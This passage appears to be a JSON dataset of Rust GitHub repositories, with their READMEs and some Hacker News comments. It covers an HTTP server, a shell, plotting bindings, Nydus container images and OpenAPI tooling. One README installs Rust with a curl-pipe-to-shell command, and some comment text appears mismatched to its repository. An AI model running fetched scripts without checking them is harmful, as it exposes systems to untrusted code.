a URL to redirect to using HTTP 301 Moved Permanently\n -t, --threads How many worker threads [default: 3]\n --try-file \n serve this file (server root relative) in place of missing files (useful for single page apps) [aliases:\n try-file-404]\n -l, --upload-size-limit Upload file size limit [bytes] [default: 8000000]\n\n\n```\n\n# Installation\n\n### Download binary \n[Goto Download](https://github.com/TheWaWaR/simple-http-server/releases)\n\n - windows-64bit\n - osx-64bit\n - linux-64bit\n\n\n### Install by cargo\n\n``` bash\n# Install Rust\ncurl https://sh.rustup.rs -sSf | sh\n\n# Install simple-http-server\ncargo install simple-http-server\nrehash\nsimple-http-server -h\n```\n\n# Features\n- [x] Windows support (with colored log)\n- [x] Specify listen address (ip, port)\n- [x] Specify running threads\n- [x] Specify root directory\n- [x] Pretty log\n- [x] Nginx like directory view (directory entries, link, filesize, modfiled date)\n- [x] Breadcrumb navigation\n- [x] (default enabled) Guess mime type\n- [x] (default enabled) HTTP cache control\n - Sending Last-Modified / ETag\n - Replying 304 to If-Modified-Since\n- [x] (default enabled) Partial request\n - Accept-Ranges: bytes([ByteRangeSpec; length=1])\n - [Range, If-Range, If-Match] => [Content-Range, 206, 416]\n- [x] (default disabled) Automatic render index page [index.html, index.htm]\n- [x] (default disabled) Upload file\n - A CSRF token is generated when upload is enabled and must be sent as a parameter when uploading a file\n- [x] (default disabled) HTTP Basic Authentication (by username:password)\n- [x] Sort by: filename, filesize, modifled\n- [x] HTTPS support\n- [x] Content-Encoding: gzip/deflate\n- [x] Added CORS headers support\n- [x] Silent mode\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nuta/nsh", "link": "https://github.com/nuta/nsh", "tags": ["cli", "rust", "shell"], "stars": 818, "description": "A command-line shell like fish, but POSIX compatible.", "lang": "Rust", "repo_lang": "", "readme": "nsh\n====\n![CI Status](https://github.com/nuta/nsh/workflows/CI/badge.svg?branch=master)\n[![Latest version](https://img.shields.io/crates/v/nsh.svg)](https://crates.io/crates/nsh)\n\nA command-line shell that focuses on productivity and swiftness featuring:\n\n- A POSIX compliant interactive shell with some Bash extensions.\n- Tab completions and syntax highlighting.\n- Bash completion support (by internally invoking the genuine Bash).\n- Builtin zero configration features.\n- Written in Rust :crab:\n\n![screenshot](https://gist.githubusercontent.com/nuta/5747db6c43978d9aa1941ce321cc1741/raw/405b7a1156292fd0456010b657f299b1daa367ff/nsh.png)\n\nInstallation\n------------\n```\n$ cargo install nsh\n```\n\nDocumentation\n-------------\n**[Documentation](https://github.com/nuta/nsh/tree/master/docs)**\n\nWhy create a new shell?\n-----------------------\nBash is the best for executing shell scripts but its interactive mode is not satisfactory. I am\na zsh user for the last decade but I don't need *customizability* and got tired of making my zshrc\nfaster. Fish is really neat but I prefer old-fashioned, traditional, and ergonomic shell syntax.\n\nContributing\n------------\nnsh is in *alpha* stage: there are many missing features which Bash provides, there are kludges in\nsource code, and there must be bugs. To make nsh practical for daily use, I need your help!\n\n### How can I contribute?\n- **Report bugs** in [GitHub issues](https://github.com/nuta/nsh/issues). Please attach\n a minimal reproducible example (e.g. shell script) *if possible*. It helps me to fix the bug easier.\n- **Suggest enhancements** in [GitHub issues](https://github.com/nuta/nsh/issues).\n- **Submit a Pull Request** which implements a new feature, fixes a bug, refactors code, rephrases sentences in documentation, etc.\n\nLicense\n-------\nCC0 or MIT. Choose whichever you prefer.\n", "readme_type": "markdown", "hn_comments": "I've been having a blast writing plain old HTML templates for the past few weeks. It's a traditional Django app. I also use plain old CSS instead of frameworks like Tailwind (well, I use Bootstrap, but I don't use its utility classes).It's practical, pragmatic, and allows me to ship faster.Fresh does this, but I don't know who's using it in production, other than possibly the Deno people.https://fresh.deno.dev/docs/introduction> Even if you use React in small areas where it pulls its weight but generally try and stick to simplicity of sending plain ol' HTMLThe reason why so many apps use React/Vue/whatever for everything is because this hybrid setup is far from simple. It leaves you with two different ways of rendering views, which creates unnecessary context switching for developers, and the interface between the two is often ugly and complicated and prone to memory leaks if you're not careful. It also prevents you from taking advantage of the most powerful patterns in these frameworks, which rely on the assumption that it's running as a single page app.The fact is, if your app has functions that require a JavaScript framework to work, the most straightforward answer is to build the whole app in that framework, rather than trying to cobble together multiple front end systems.Considering their stack, I'd say probably GitHub?Remix Run is what you want[dead]Been working on a html over the wire library in Go: https://github.com/livefir/fir. It mostly works but still work in progressHow timely, I, too, am in the market for a new job and I've noticed that ridiculous new buzz of \"HTML over the wire\" or related to \"over/on the wire\". Thanks for writing this.It is quite easy to say \u201cyou should definitely use x\u201d by giving examples of simple applications. however, the vast majority of examples given will turn the app into a soup if you want to do a thorough study. If you're happy with this soup, it's up to you. So enjoy your soups and stop criticizing the useful things people produce with empty arguments. If you have a worthy alternative, offer them. Please stop suggesting things like htmx as alternatives.Where I work we're currently developing an administration / employee-only pages using server-side Blazor.I don't know if this counts as \"HTML over the wire\" because server-side Blazor contains some magic to make the page kinda-sorta act like AJAX. It's a little laggy, but for our purposes, it's \"good enough.\"(The customer-facing pages are going to be SPAs, for very good reasons.)https://optirtc.com/company/careers/Well I'm glad I've discovered HTMx with this thread, I will try it out with my next project, really tired of SPAs and their bulkinessold man alert Back in my day, we wrote ASP.NET that was all server-side-rendered HTML. Once in a while we got REAL FANCY and used JQuery to make PARTIAL HTML requests and update only FRAGMENTS of the page. Hooboy I knew that fashion was cyclical but not tech!We embraced Hotwire with a Clojure backend. Favorite things:- One language model (i.e. no JS, just our favorite backend language)- Extremely minimal front-end tooling- All data is manipulated with the same tools- No client-side routing, validation, or... really much at allP.S. We even wrote our own import-maps solution to avoid needing a JS bundler for the small stuff you can't do without JS.All companies using Elixir / LiveView, there are quite a fewhttps://www.otto.de/I used them this week for the first time and was impressed by the responsiveness on my phone. I looked into the network tab and what I saw was an over-the-wire solution.However, I'm sure that you can also achieve responsiveness this without HTML over the wire. I scimmed a few blog posts, and it seemed to me like they use Java EE, although I'm not entirely sure.People have gotten way too religious over SPAs, SSR, etc.Should you use X? Maybe it depends. I have been burned by using SSR when the complexity of the app increased and suddenly doing SSR was getting in the way and now I was uncomfortably mixing JS with server rendered pages and struggling to maintain state. I've also been on the other side, using React and creating more complexity than was needed.The point is: don't be dogmatic. Get requirements, extrapolate what could happen in the future, use first principles, weigh decisions against team capabilities, ask yourself if your decisions are for your own personal reasons or have significant positive user/business impact.Engineers who rush to use one technology over the other without doing their homework are just doing bad engineering. It has nothing to do with \"fighting the good fight\".My last gig used Rails' Hotwire, and my new gig is using Phoenix Liveview.Thankfully people are waking up and seeing that JS is most appropriate as a \"last resort\" technology.We\u2019re using Hotwire extensively at https://mailpace.comIt\u2019s a joy! But we\u2019re not hiring\u2026lol. We're going to end up with xslt again aren't we, it's just a matter of time.For those mentioning frameworks that update the page by getting HTML from the server and patching it into the page: how do you deal with server-client skew?It depends... are you delivering mostly static content or creating and interactive application front-end? Most sites are somewhere in the middle and so should the responses.For me, if it's an application ui/ux, then the rendering should be almost exclusively on the front-end. It's just delivered via a web server instead of installed. Yeah, it's larger than server-sent. It's also emphatically not tying up server resources for template processing, instead using the super computer on your desk or in your pocket.I frankly feel ill when I see more than a couple hundred kb of compressed JS go over the wire... why a couple hundred, that's just where I draw the line... React + MUI with some optimizations and all the application logic should easily fit in under 300k compressed payload. If you're going over that, you're probably doing something very, very wrong. Not that you can't go much smaller and hand crafted. It's a trade-off.I also think edge development tools like Cloudflare Workers and Deno are exceedingly nice and can seriously bridge the gap closer to server rendered, but still not the same as a lot of classic legacy apps.On the flip side, I look at how much memory and resources applications use on a server as it is... They're often massively under-utilized as well. So who knows. I just know that there's nothing wrong in using the client's system to render the client.100% JS fatigue after having worked as a professional full-stack JS dev for 8 years. \nUsing Phoenix LiveView to build our MVP: https://github.com/dwyl/mvp haven\u2019t written JS in months (except maintaining old Open Source packages) don\u2019t miss it at all.I work for a B2B SaaS and we use Ruby on Rails with Hotwire and it's great!Almost zero JS (no Vue.js, no React, or else).I'm building a webapp[0] for turning Clickup docs into static sites, using CF Workers. There isn't a framework for Workers that has the flexibility I need, so I home-rolled one that only sends rendered HTML over the wire. Async components are supported too, so if I have a particularly data-intensive component the renderer just inlines a tiny JS script that sends a request to the worker again, which then returns just that component in HTML.Could be worth releasing on its own as a GitHub project![0] https://intenso.appIs \u201cHTML over the wire\u201d a new buzzword for SSR or is there a difference I'm missing?You can also go to the extreme of \"jpeg over the wire\". Your \"web browser\" could probably be implemented in <1000 lines of of code ;) No state, no cookies, no million lines of bundled JavaScript.We use htmx + Node, and we are hiring. PM me on Twitter @alexblearnsEschew developer fashion (and fashion contrarianism) and use the best tool for the job. It doesn't make sense to pick the tool before you even know what problem you're trying to solve.You don't even need a fancy \"send html fragments over the wire\" approach to create a better user and developer experience.Just sending full pages, server side rendered, like Hacker News and Wikipedia do is fine:Going from the HN homepage to this topic we are on: 36 KB in 5 requests.\n\nGoing from the Wikipedia Homepage to an article: 824 KB in 25 requests\n\nGoing from the AirBnB homepage to an apartment listing: 11.4 MB in 265 requests.\n\nGoing from the Reddit homepage to a Reddit thread: 3.74 MB in 40 requests\n\nIn comparison to AirBnB and Reddit, HN and Wikipedia feel blazingly fast. And I am sure the developer experience is an order of magnitude nicer as well.I think I get it. You really don't want to shift your mind to the browser. Your mind is in the server, you know what's up in there, and distributed systems are complicated, so one of the ends should be made as dumb as possible. I get it.Except, guess where the mind of the user is? On the other side of the browser. Embrace the browser, server people, it's closer to the user!Most of us are small-time businesses that never bought the overcomplexification of anything and we were constantly shamed about it. \"Server-side-rendering\" is still a laughable phrase though.SPA is to manage \"CLIENT\" side state, not about server-related stuff ?Look for companies that use Rails, Phoenix, or Laravel.Laminar (Scala framework) hasn't been mentioned yet so dropping it here as an awesome framework that support HTML-over-the-wire. It can be used together with React, HTMX, and many other frontend frameworks -- but doesn't have to be.https://laminar.dev/When I use apps like this - GitLab - I am struck by how much wasted user time such an approach leads to. Everything is a page refreshSend me some counter examples? Im a big SPA fan and there\u2019s lots of good examplesIsn't making a request for almost any user interaction a bit too much?I am more in favour of BE telling FE what to render. I honestly believe many apps could be simplified with better abstractions than hard coding html into messy components. Not saying it's a great approach for super complex layouts, of course.This seems like a good time to ask web people to stop using the private unicode range for icons. It's bad practice because downloadable fonts are considered optional, and there is no fallback equivalent to alt text for undefined glyphs.I was just watching a talk about htmx which is awesome looking. i'm a rails guy myself so i am really interested in using hotwire in some projects. htmx looks like a very nice crossplatform approach.https://htmx.org/Here is the talk:\nhttps://htmx.org/essays/a-real-world-react-to-htmx-port/In the Go world, the only implementation I personally know of is in Kyoto, but that tool has still a long way to go.I'd be happy to learn of other Go tools using this.Browsing HN on lynx (not logged in, haven't figured out cookie jar, settings, etc) in the early morning, it was a completely different experience: a dark screen, monocolored text, and comments.It felt like a darkened cafe of inquisitive, sometimes humorous--at turns indignant or snarky--conversation: even intimate, close-quarters, sipping at coffee or wine.That's what I miss about HN's past feature: we can't browse to a segment of a day. The front page changes across twenty-four hours, an ebb and flow of ephemeral delights.I guess that's what I'll set lynx with next: sessions, printing, and a way to quickly save snippets of text. The comments are so valuable for follow-up.I understand your frustration. I feel the same way. I think the web development landscape has become unnecessarily complex. I sometimes miss how simple it used to be to just throw some PHP files together and have a working website up and running. Granted, those \u201csimple\u201d websites came with their own set of issues (especially security-wise), but I still miss that simplicity.Over the past 10-ish years alone, I\u2019ve watched web development go through so many phases, it\u2019s not even funny. Anyone remember gulp.js? Well, I remember a time when every conference talk mentioned it and you were weird if you didn\u2019t use it. Backbone.js anyone?In my experience, I\u2019ve found that most folks can\u2019t even tell you WHY they use React or insert JavaScript framework here.Not too long ago, I was stepping through some \u201chello world\u201d code for a trendy framework and the amount of code that was touched just to write \u201chello world\u201d in the browser felt absolutely ridiculous to me.Let me stop myself before I go on a prolonged rant . . .Anyway, all that said, this is why I\u2019m a fan of SvelteKit (Svelte) and Remix (React). I think they provide a decent balance of modern features while building on native web features/protocols properly.I have been using Blazor for projects in the last year. It's okay (still immature). It uses Websockets when available (HTTP fallback) to transfer the rendered page.I'm building a completely native HTML spa app over at lona.so (just html + js web components and i bundle it myself). Still very much so early days but check it out!FWIW most of the companies using Phoenix (Elixir) that I've talked with are sending HTML over the wire, either with LiveView or traditional Views.We are using Django+HTMX for internal applications.Some random tips:- Write a \"Django context processor\" to inspect requests for \"Hx-Request\" header, and set a \"base_template\" variable accordingly. This means that any template that {% extends base_template %} will react to being a full page or just a fragment and you don't even have to think about that in your view logic. Great for progressive enhancement.- You can get reactive JS elements (for example, a d3.js viz that updates when new data comes in) in a few lines of inline JS by using MutationObserver, and \"abusing\" HTMX by using views that return JSON targeting a \n \n \n\n```\n\nA simple `Plot` component would look as follows, using `Yew` as an example frontend framework:\n\n```rust\nuse plotly::{Plot, Scatter};\nuse yew::prelude::*;\n\n\n#[function_component(PlotComponent)]\npub fn plot_component() -> Html {\n let p = yew_hooks::use_async::<_, _, ()>({\n let id = \"plot-div\";\n let mut plot = Plot::new();\n let trace = Scatter::new(vec![0, 1, 2], vec![2, 1, 0]);\n plot.add_trace(trace);\n\n async move {\n plotly::bindings::new_plot(id, &plot).await;\n Ok(())\n }\n });\n\n \n use_effect_with_deps(move |_| {\n p.run();\n || ()\n }, (),\n );\n \n\n html! {\n
\n }\n}\n```\n\nMore detailed standalone examples can be found in the [examples/](https://github.com/igiagkiozis/plotly/tree/master/examples) directory.\n\n# Crate Feature Flags\n\nThe following feature flags are available:\n\n### `kaleido`\n\nAdds plot save functionality to the following formats: `png`, `jpeg`, `webp`, `svg`, `pdf` and `eps`.\n\n### `plotly_image`\n\nAdds trait implementations so that `image::RgbImage` and `image::RgbaImage` can be used more directly with the `plotly::Image` trace.\n\n### `plotly_ndarray`\n\nAdds support for creating plots directly using [ndarray](https://github.com/rust-ndarray/ndarray) types.\n\n### `wasm`\n\nEnables compilation for the `wasm32-unknown-unknown` target and provides access to a `bindings` module containing wrappers around functions exported by the plotly.js library.\n\n# Contributing\n\n* If you've spotted a bug or would like to see a new feature, please submit an issue on the [issue tracker](https://github.com/igiagkiozis/plotly/issues).\n\n* Pull requests are welcome, see the [contributing guide](https://github.com/igiagkiozis/plotly/blob/master/CONTRIBUTING.md) for more information.\n\n# License\n\n`Plotly.rs` is distributed under the terms of the MIT license.\n\nSee [LICENSE-MIT](https://github.com/igiagkiozis/plotly/blob/master/LICENSE-MIT), and [COPYRIGHT](https://github.com/igiagkiozis/plotly/blob/master/COPYRIGHT) for details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "servo/core-foundation-rs", "link": "https://github.com/servo/core-foundation-rs", "tags": [], "stars": 696, "description": "Rust bindings to Core Foundation and other low level libraries on Mac OS X and iOS", "lang": "Rust", "repo_lang": "", "readme": "# core-foundation-rs\n\n[![Build Status](https://travis-ci.com/servo/core-foundation-rs.svg?branch=master)](https://travis-ci.com/servo/core-foundation-rs)\n\n## Compatibility\n\nTargets macOS 10.7 by default.\n\nTo enable features added in macOS 10.8, set Cargo feature `mac_os_10_8_features`. To have both 10.8 features and 10.7 compatibility, also set `mac_os_10_7_support`. Setting both requires weak linkage, which is a nightly-only feature as of Rust 1.19.\n\nFor more experimental but more complete, generated bindings take a look at https://github.com/michaelwu/RustKit.\n\n## Contributing\n\nIf you wish to start contributing or even make a one-off change, simply submit a pull request with the code or documentation change and we'll go from there.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dragonflyoss/image-service", "link": "https://github.com/dragonflyoss/image-service", "tags": ["container", "container-image", "accelerator", "snapshotter", "containerd", "docker", "filesystem", "storage"], "stars": 695, "description": "Nydus - the Dragonfly image service, providing fast, secure and easy access to container images.", "lang": "Rust", "repo_lang": "", "readme": "# Nydus: Dragonfly Container Image Service\n\n

\n\n[![Release Version](https://img.shields.io/github/v/release/dragonflyoss/image-service?style=flat)](https://github.com/dragonflyoss/image-service/releases)\n[![License](https://img.shields.io/crates/l/nydus-rs)](https://crates.io/crates/nydus-rs)\n\n[![Smoke Test](https://github.com/dragonflyoss/image-service/actions/workflows/smoke.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/ci.yml)\n[![Image Conversion](https://github.com/dragonflyoss/image-service/actions/workflows/convert.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/convert.yml)\n[![Release Test Daily](https://github.com/dragonflyoss/image-service/actions/workflows/release.yml/badge.svg?event=schedule)](https://github.com/dragonflyoss/image-service/actions/workflows/release.yml)\n[![Twitter](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2Fdragonfly_oss)](https://twitter.com/dragonfly_oss)\n[![Nydus Stars](https://img.shields.io/github/stars/dragonflyoss/image-service?label=Nydus%20Stars&style=social)](https://github.com/dragonflyoss/image-service)\n\n## Introduction\nThe nydus project implements a content-addressable filesystem on top of a RAFS format that improves the current OCI image specification, in terms of container launching speed, image space, and network bandwidth efficiency, as well as data integrity.\n\nThe following benchmarking result shows the performance improvement compared with the OCI image for the container cold startup elapsed time on containerd. As the OCI image size increases, the container startup time of using Nydus image remains very short.\n\n![Container Cold Startup](./misc/perf.jpg)\n\nNydus' key features include:\n\n- Container images can be downloaded on demand in chunks for lazy pulling to boost container startup\n- Chunk-based content-addressable data de-duplication to minimize storage, transmission and memory footprints\n- Merged filesystem tree in order to remove all intermediate layers as an option\n- in-kernel EROFS or FUSE filesystem together with overlayfs to provide full POSIX compatibility\n- E2E image data integrity check. So security issues like \"Supply Chain Attach\" can be avoided and detected at runtime\n- Compatible with the OCI artifacts spec and distribution spec, so nydus image can be stored in a regular container registry\n- Native [eStargz](https://github.com/containerd/stargz-snapshotter) image support with remote snapshotter plugin `nydus-snapshotter` for containerd runtime.\n- Various container image storage backends are supported. For example, Registry, NAS, Aliyun/OSS, S3.\n- Integrated with CNCF incubating project Dragonfly to distribute container images in P2P fashion and mitigate the pressure on container registries\n- Capable to prefetch data block before user IO hits the block thus to reduce read latency\n- Record files access pattern during runtime gathering access trace/log, by which user abnormal behaviors are easily caught\n- Access trace based prefetch table\n- User I/O amplification to reduce the amount of small requests to storage backend.\n\nCurrently Nydus includes following tools:\n\n| Tool | Description |\n| ---------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| [nydusd](https://github.com/dragonflyoss/image-service/blob/master/docs/nydusd.md) | Nydus user-space daemon, it processes all fscache/FUSE messages from the kernel and parses Nydus images to fullfil those requests |\n| [nydus-image](https://github.com/dragonflyoss/image-service/blob/master/docs/nydus-image.md) | Convert a single layer of OCI format container image into a nydus format container image generating meta part file and data part file respectively |\n| [nydusify](https://github.com/dragonflyoss/image-service/blob/master/docs/nydusify.md) | It pulls OCI image down and unpack it, invokes `nydus-image create` to convert image and then pushes the converted image back to registry and data storage |\n| [nydusctl](https://github.com/dragonflyoss/image-service/blob/master/docs/nydus-image.md) | Nydusd CLI client (`nydus-image inspect`), query daemon's working status/metrics and configure it |\n| [ctr-remote](https://github.com/dragonflyoss/image-service/tree/master/contrib/ctr-remote) | An enhanced `containerd` CLI tool enable nydus support with `containerd` ctr |\n| [nydus-docker-graphdriver](https://github.com/nydusaccelerator/docker-nydus-graphdriver) | [Experimental] Works as a `docker` remote graph driver to control how images and containers are stored and managed |\n| [nydus-overlayfs](https://github.com/dragonflyoss/image-service/tree/master/contrib/nydus-overlayfs) | `Containerd` mount helper to invoke overlayfs mount with tweaking mount options a bit. So nydus prerequisites can be passed to vm-based runtime |\n| [nydus-backend-proxy](./contrib/nydus-backend-proxy/README.md) | A simple HTTP server to serve local directory as a blob backend for nydusd |\n\nCurrently Nydus is supporting the following platforms in container ecosystem:\n\n| Type | Platform | Description | Status |\n| ------------- | --------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------ |\n| Storage | Registry/OSS/S3/NAS | Support for OCI-compatible distribution implementations such as Docker Hub, Harbor, Github GHCR, Aliyun ACR, NAS, and Aliyun OSS-like object storage service | \u2705 |\n| Storage/Build | [Harbor](https://github.com/goharbor/acceleration-service) | Provides a general service for Harbor to support acceleration image conversion based on kinds of accelerator like Nydus and eStargz etc | \u2705 |\n| Distribution | [Dragonfly](https://github.com/dragonflyoss/Dragonfly2) | Improve the runtime performance of Nydus image even further with the Dragonfly P2P data distribution system | \u2705 |\n| Build | [Buildkit](https://github.com/moby/buildkit/blob/master/docs/nydus.md) | Provides the ability to build and export Nydus images directly from Dockerfile | \u2705 |\n| Runtime | Kubernetes | Run Nydus image using CRI interface | \u2705 |\n| Runtime | [Containerd](https://github.com/containerd/nydus-snapshotter) | Nydus Snapshotter, a containerd remote plugin to run Nydus image | \u2705 |\n| Runtime | [CRI-O / Podman](https://github.com/containers/nydus-storage-plugin) | Run Nydus image with CRI-O or Podman | \ud83d\udea7 |\n| Runtime | [Docker](https://github.com/nydusaccelerator/docker-nydus-graphdriver) | [Experimental] Run Nydus image in Docker container with graphdriver plugin | \ud83d\udea7 |\n| Build/Runtime | [Nerdctl](https://github.com/containerd/nerdctl/blob/master/docs/nydus.md) | The containerd client to build or run (requires nydus snapshotter) Nydus image | \u2705 |\n| Runtime | [KataContainers](https://github.com/kata-containers/kata-containers/blob/main/docs/design/kata-nydus-design.md) | Run Nydus image in KataContainers as a native solution | \u2705 |\n| Runtime | [EROFS](https://www.kernel.org/doc/html/latest/filesystems/erofs.html) | Run Nydus image directly in-kernel EROFS for even greater performance improvement | \u2705 |\n\nTo try nydus image service:\n\n1. Convert an original OCI image to nydus image and store it somewhere like Docker/Registry, NAS, Aliyun/OSS or S3. This can be directly done by `nydusify`. Normal users don't have to get involved with `nydus-image`.\n2. Get `nydus-snapshotter`(`containerd-nydus-grpc`) installed locally and configured properly. Or install `nydus-docker-graphdriver` plugin.\n3. Operate container in legacy approaches. For example, `docker`, `nerdctl`, `crictl` and `ctr`.\n\n## Build Binary\n\n```shell\n# build debug binary\nmake\n# build release binary\nmake release\n# build static binary with docker\nmake docker-static\n```\n\n## Quick Start with Kubernetes and Containerd\n\nFor more details on how to lazily start a container with `nydus-snapshotter` and nydus image on Kubernetes nodes or locally use `nerdctl` rather than CRI, please refer to [Nydus Setup](./docs/containerd-env-setup.md)\n\n## Build Nydus Image\n\nBuild Nydus image from directory source: [Nydus Image Builder](./docs/nydus-image.md).\n\nConvert OCIv1 image to Nydus image: [Nydusify](./docs/nydusify.md), [Acceld](https://github.com/goharbor/acceleration-service) or [Nerdctl](https://github.com/containerd/nerdctl/blob/master/docs/nydus.md#build-nydus-image-using-nerdctl-image-convert).\n\n## Nydus Snapshotter\n\nNydus-snapshotter is a non-core sub-project of containerd.\n\nCheck out its code and tutorial from [Nydus-snapshotter repository](https://github.com/containerd/nydus-snapshotter).\nIt works as a `containerd` remote snapshotter to help setup container rootfs with nydus images, which handles nydus image format when necessary. When running without nydus images, it is identical to the containerd's builtin overlayfs snapshotter.\n\n## Run Nydusd Daemon\n\nNormally, users do not need to start `nydusd` by hand. It is started by `nydus-snapshotter` when a container rootfs is prepared.\n\nRun Nydusd Daemon to serve Nydus image: [Nydusd](./docs/nydusd.md).\n\n## Run Nydus with in-kernel EROFS filesystem\n\nIn-kernel EROFS has been fully compatible with RAFS v6 image format since Linux 5.16. In other words, uncompressed RAFS v6 images can be mounted over block devices since then.\n\nSince [Linux 5.19](https://lwn.net/Articles/896140), EROFS has added a new file-based caching (fscache) backend. In this way, compressed RAFS v6 images can be mounted directly with fscache subsystem, even such images are partially available. `estargz` can be converted on the fly and mounted in this way too.\n\nGuide to running Nydus with fscache: [Nydus-fscache](./docs/nydus-fscache.md)\n\n## Run Nydus with Dragonfly P2P system\n\nNydus is deeply integrated with [Dragonfly](https://d7y.io/) P2P system, which can greatly reduce the network latency and the single point of network pressure for registry server, testing in the production environment shows that using Dragonfly can reduce network latency by more than 80%, to understand the performance test data and how to configure Nydus to use Dragonfly, please refer to the [doc](https://d7y.io/docs/setup/integration/nydus).\n\n## Accelerate OCI image directly with Nydus\n\nNydus is able to generate a tiny artifact called a `nydus zran` from an existing OCI image in the short time. This artifact can be used to accelerate the container boot time without the need for a full image conversion. For more information, please see the [documentation](./docs/nydus-zran.md).\n\n## Build Images via Harbor\n\nNydus cooperates with Harbor community to develop [acceleration-service](https://github.com/goharbor/acceleration-service) which provides a general service for Harbor to support image acceleration based on kinds of accelerators like Nydus, eStargz, etc.\n\n## Run with Docker\n\nA **experimental** plugin helps to start Docker container from nydus image. For more particular instructions, please refer to [Docker Nydus Graph Driver](https://github.com/nydusaccelerator/docker-nydus-graphdriver)\n\n## Run with macOS\n\nNydus can also run with macfuse(a.k.a osxfuse).For more details please read [nydus with macOS](./docs/nydus_with_macos.md).\n\n## Run eStargz image (with lazy pulling)\n\nThe containerd remote snapshotter plugin [nydus-snapshotter](https://github.com/containerd/nydus-snapshotter) can be used to run nydus images, or to run [eStargz](https://github.com/containerd/stargz-snapshotter) images directly by appending `--enable-stargz` command line option.\n\nIn the future, `zstd::chunked` can work in this way as well.\n\n## Documentation\n\nBrowse the documentation to learn more. Here are some topics you may be interested in:\n\n- [A Nydus Tutorial for Beginners](./docs/tutorial.md)\n- [Nydus Design Doc](./docs/nydus-design.md)\n- Our talk on Open Infra Summit 2020: [Toward Next Generation Container Image](https://drive.google.com/file/d/1LRfLUkNxShxxWU7SKjc_50U0N9ZnGIdV/view)\n- [EROFS, What Are We Doing Now For Containers?](https://static.sched.com/hosted_files/kccncosschn21/fd/EROFS_What_Are_We_Doing_Now_For_Containers.pdf)\n- [The Evolution of the Nydus Image Acceleration](https://d7y.io/blog/2022/06/06/evolution-of-nydus/) \\([Video](https://youtu.be/yr6CB1JN1xg)\\)\n- [Introduction to Nydus Image Service on In-kernel EROFS](https://static.sched.com/hosted_files/osseu2022/59/Introduction%20to%20Nydus%20Image%20Service%20on%20In-kernel%20EROFS.pdf) \\([Video](https://youtu.be/2Uog-y2Gcus)\\)\n\n## Community\n\nNydus aims to form a **vendor-neutral opensource** image distribution solution to all communities.\nQuestions, bug reports, technical discussion, feature requests and contribution are always welcomed!\n\nWe're very pleased to hear your use cases any time.\nFeel free to reach/join us via Slack and/or Dingtalk.\n\n- **Slack:** [Nydus Workspace](https://join.slack.com/t/nydusimageservice/shared_invite/zt-pz4qvl4y-WIh4itPNILGhPS8JqdFm_w)\n\n- **Twitter:** [@dragonfly_oss](https://twitter.com/dragonfly_oss)\n\n- **Dingtalk:** [34971767](https://qr.dingtalk.com/action/joingroup?code=v1,k1,ioWGzuDZEIO10Bf+/ohz4RcQqAkW0MtOwoG1nbbMxQg=&_dt_no_comment=1&origin=11)\n\n\n\n- **Technical Meeting:** Every Wednesday at 06:00 UTC (Beijing, Shanghai 14:00), please see our [HackMD](https://hackmd.io/@Nydus/Bk8u2X0p9) page for more information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "paperclip-rs/paperclip", "link": "https://github.com/paperclip-rs/paperclip", "tags": ["hacktoberfest", "openapi", "rust"], "stars": 695, "description": "WIP OpenAPI tooling for Rust.", "lang": "Rust", "repo_lang": "", "readme": "# Paperclip\n\n![Build Status](https://github.com/paperclip-rs/paperclip/actions/workflows/cicd.yml/badge.svg)\n![Linter Status](https://github.com/paperclip-rs/paperclip/actions/workflows/linter.yml/badge.svg)\n[![Usage docs](https://img.shields.io/badge/quickstart-blue.svg)](https://paperclip-rs.github.io/paperclip)\n[![API docs](https://img.shields.io/badge/docs-latest-blue.svg)](https://paperclip-rs.github.io/paperclip/paperclip)\n[![Crates.io](https://img.shields.io/crates/v/paperclip.svg)](https://crates.io/crates/paperclip)\n\nPaperclip offers tooling for the [OpenAPI specification](https://github.com/OAI/OpenAPI-Specification/). Once complete, it will provide:\n\n- Code generation for efficient, type-safe, compile-time checked HTTP APIs (server, client and CLI) in Rust.\n- Support for processing, validating and hosting OpenAPI spec.\n- Customization for spec and code generation.\n\nIt's currently under active development and may not be ready for production use just yet.\n\nYou may be interested in:\n\n - [Examples and Usage](https://paperclip-rs.github.io/paperclip).\n - [Features being worked on](https://github.com/paperclip-rs/paperclip/projects).\n - [API documentation](https://paperclip-rs.github.io/paperclip/paperclip).\n\n## Developing locally\n\n - Make sure you have [`rustup`](https://rustup.rs/) installed. `cd` into this repository and run `make prepare` to setup your environment.\n - Now run `make` to build and run the tests.\n\n## Contributing\n\nThis project welcomes all kinds of contributions. No contribution is too small!\n\nIf you want to contribute to this project but don't know how to begin or if you need help with something related to this project, feel free to send me an email (in Github profile) or join the [Discord server](https://discord.gg/PPu4Dhj).\n\n## Code of Conduct\n\nThis project follows the [Rust Code of Conduct](https://www.rust-lang.org/policies/code-of-conduct).\n\n## License\n\nLicensed under either of\n\n- Apache License, Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n- MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Sponsors\n\nFolks who have sponsored for the development of this project:\n\n\n \n \n
\n
